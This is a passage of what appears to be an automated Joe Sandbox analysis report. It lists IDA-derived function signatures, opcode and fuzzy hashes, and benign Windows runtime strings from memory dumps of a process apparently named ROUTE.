                                                                                 • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-$0$0
                                                                                • API String ID: 1302938615-699404926
                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction ID: 2fcc79123f9c29c3eaccee3e052cbd296d2f1f1caaaaf5c87cf0167e7c924a28
                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction Fuzzy Hash: 2981AD70E072499BDF24EF68C8917FEBBE6AF45320F1C465AD8E1A7390C6389851CB54
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                 • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$[$]:%u
                                                                                • API String ID: 48624451-2819853543
                                                                                • Opcode ID: 59bc8f069edb495148c5d5bc7e60907153b7db3f623d0601411c5f997b4ab086
                                                                                • Instruction ID: 82481a4518b53b8abe642f7933a50c2e9039084d8b4264b43f33057ef3e79e87
                                                                                • Opcode Fuzzy Hash: 59bc8f069edb495148c5d5bc7e60907153b7db3f623d0601411c5f997b4ab086
                                                                                • Instruction Fuzzy Hash: 6221537AA02219AFDB10EF69CC50AEFB7ECAF94640F480556EA45D7600E730D9418BA5
                                                                                Strings
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030B02BD
                                                                                • RTL: Re-Waiting, xrefs: 030B031E
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030B02E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                 • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                • API String ID: 0-2474120054
                                                                                • Opcode ID: e6304f1a3061227e1cbda0113ebaed9f439ff8586e7391168c0236150ba6661b
                                                                                • Instruction ID: e1d296a7cea1f5a6be3b032532bf10ce88b979b2b869c5adc5c7495273a13a88
                                                                                • Opcode Fuzzy Hash: e6304f1a3061227e1cbda0113ebaed9f439ff8586e7391168c0236150ba6661b
                                                                                • Instruction Fuzzy Hash: CCE1DD3060A7429FD724CF28D884B6BB7E4BF88724F184A6DF4A58B2E1D774D944CB52
                                                                                Strings
                                                                                • RTL: Resource at %p, xrefs: 030B7B8E
                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 030B7B7F
                                                                                • RTL: Re-Waiting, xrefs: 030B7BAC
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                 • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 0-871070163
                                                                                • Opcode ID: 389fd9dc18faf80078d5eb00890d8fa2b9a5f885e8f6b24f7e78ffff9da43d87
                                                                                • Instruction ID: a44616b31935cac2e112dcd99bf4d4e3a069bb8fea659ffc60dee34e9602a723
                                                                                • Opcode Fuzzy Hash: 389fd9dc18faf80078d5eb00890d8fa2b9a5f885e8f6b24f7e78ffff9da43d87
                                                                                • Instruction Fuzzy Hash: CE41E3357067069FC724DE25C840BAAB7E5EF89B10F040A1DF856DB280DB71E5068B95
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030B728C
                                                                                Strings
                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 030B7294
                                                                                • RTL: Resource at %p, xrefs: 030B72A3
                                                                                • RTL: Re-Waiting, xrefs: 030B72C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                 • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-605551621
                                                                                • Opcode ID: bf565c916d5eef825ff4e9fb0c4716c952969c1956a661eb5999dedc89bd4d36
                                                                                • Instruction ID: 871e2827c574853a166c1d588aff62b0cc7c15c9c249dee788de12f645f5870b
                                                                                • Opcode Fuzzy Hash: bf565c916d5eef825ff4e9fb0c4716c952969c1956a661eb5999dedc89bd4d36
                                                                                • Instruction Fuzzy Hash: B441CE35B02306ABC720DF25CC41BAAB7F5FF84B10F180A19F995AB640DB21E8528BD5
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$]:%u
                                                                                • API String ID: 48624451-3050659472
                                                                                • Opcode ID: 77ca35e1f67eee517b6a909c7d8cce482a5d5d5fd69537661d80d54587e8da60
                                                                                • Instruction ID: ed54d229eb7b8e7816db092102190dae2f67e71ce9a503873153cd4f1d9a00e2
                                                                                • Opcode Fuzzy Hash: 77ca35e1f67eee517b6a909c7d8cce482a5d5d5fd69537661d80d54587e8da60
                                                                                • Instruction Fuzzy Hash: 76319A7AA016199FDB60DF29CC40BEFB7FCEF44610F454996E949D7200EB30DA448B60
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-
                                                                                • API String ID: 1302938615-2137968064
                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction ID: 6841aaead110e8d10cf911dbf0b6bd318d155b0316eaeb573782596f226ab168
                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction Fuzzy Hash: E991A771E022199BDB64EF59C8807BEB7F5AF44B20F78451AE8E5E72D9DB3099408B10
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $$@
                                                                                • API String ID: 0-1194432280
                                                                                • Opcode ID: e84832fc2a8a4b4ffd4bc4adb0ccea0610ae8e45cc723e7609d51af5a2f904ae
                                                                                • Instruction ID: 937c96f980ae167e920cf867d83787ef5975a08e2da2ac4af8fefa7234f2682a
                                                                                • Opcode Fuzzy Hash: e84832fc2a8a4b4ffd4bc4adb0ccea0610ae8e45cc723e7609d51af5a2f904ae
                                                                                • Instruction Fuzzy Hash: 29813DB5D022699BDB35DB98CC44BEEB7B8AF48750F0445EAE909B7250D7305E80CFA0